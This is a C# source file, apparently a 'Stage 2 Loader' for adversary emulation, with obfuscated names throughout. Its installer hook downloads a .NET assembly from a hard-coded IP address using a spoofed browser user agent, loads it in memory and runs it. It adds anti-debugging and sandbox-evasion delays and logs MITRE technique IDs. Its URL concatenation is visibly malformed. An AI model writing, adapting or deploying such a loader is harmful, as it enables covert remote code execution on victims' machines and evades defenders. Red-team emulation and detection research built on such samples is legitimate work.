using System;
using System.Configuration.Install;
using System.ComponentModel;
using System.Collections;
using System.Net;
using System.Reflection;
using System.IO;
using System.Threading;
using System.Diagnostics;

[RunInstaller(true)]
public class xbgvzr : Installer
{
    const string xqwtx = "http://100.111.22.117:8000";
    const string nyjyvze = "https://http://100.111.22.117:8000/stage/1099/3?endpoint_id=10";
    const string ewcxo = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/517.36 (HTML";
    const string zvgqlpe = "10";
    const string zekdbm = "1099";

    private string yqyhqs()
    {
        string bjsgxx = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
        return Path.Combine(bjsgxx, zekdbm);
    }

    private void nkxiyv(string xwnxl, string jhgnl)
    {
        try
        {
            string nxuvq = yqyhqs();
            if (!Directory.Exists(nxuvq))
                Directory.CreateDirectory(nxuvq);
            
            string bguxw = Path.Combine(nxuvq, "Timestamp-Log.txt");
            string wlkwo = $"[{DateTime.Now:yyyy-MM-dd HH:mm:ss}][Stage 2 Loader-DLL Universal NET]: {jhgnl}=[RESULT]";
            
            using (StreamWriter qdbzdo = File.AppendText(bguxw))
            {
                qdbzdo.WriteLine(wlkwo);
            }
        }
        catch { }
    }

    private bool jmlzdp()
    {
        bool okgbsb = false;
        try
        {
            if (Debugger.IsAttached)
                return true;
                
            long njblj = Environment.TickCount;
            Thread.Sleep(new Random().Next(2000, 5000));
            long wzkwlq = Environment.TickCount;
            
            if ((wzkwlq - njblj) < 2000)
                okgbsb = true;
                
            int lymcpf = Process.GetProcesses().Length;
            if (lymcpf < 50)
                okgbsb = true;
        }
        catch { }
        
        if (okgbsb)
            Thread.Sleep(new Random().Next(30000, 90000));
            
        return false;
    }

    private byte[] alnys()
    {
        byte[] xgptzh = null;
        
        try
        {
            jmlzdp();
            
            string yiqwgt = xqwtx;
            string pvjqra = nyjyvze;
            string knaqtf = ewcxo;
            
            using (WebClient azhlwj = new WebClient())
            {
                azhlwj.Headers.Add("User-Agent", knaqtf);
                azhlwj.Proxy = null;
                
                string llzfb = $"{yiqwgt}{pvjqra}";
                xgptzh = azhlwj.DownloadData(llzfb);
            }
            
            nkxiyv("T1105", $"{zvgqlpe}-{zekdbm}-T1105");
        }
        catch (WebException)
        {
            Thread.Sleep(30000);
            return null;
        }
        catch
        {
            return null;
        }
        
        return xgptzh;
    }

    private void zqhtst(byte[] lhwvsi)
    {
        if (lhwvsi == null || lhwvsi.Length == 0)
            return;
            
        try
        {
            jmlzdp();
            
            Assembly nqnzqg = Assembly.Load(lhwvsi);
            MethodInfo bbrnqr = nqnzqg.EntryPoint;
            
            if (bbrnqr != null)
            {
                object wdxvrz = nqnzqg.CreateInstance(bbrnqr.Name);
                bbrnqr.Invoke(wdxvrz, new object[] { new string[0] });
                nkxiyv("T1620", $"{zvgqlpe}-{zekdbm}-T1620");
            }
        }
        catch { }
    }

    public override void Install(IDictionary stateSaver)
    {
        base.Install(stateSaver);
        
        for (int rjzpx = 0; rjzpx < 3; rjzpx++)
        {
            byte[] fzliqj = alnys();
            if (fzliqj != null)
            {
                zqhtst(fzliqj);
                break;
            }
            
            Thread.Sleep(60000);
        }
    }
}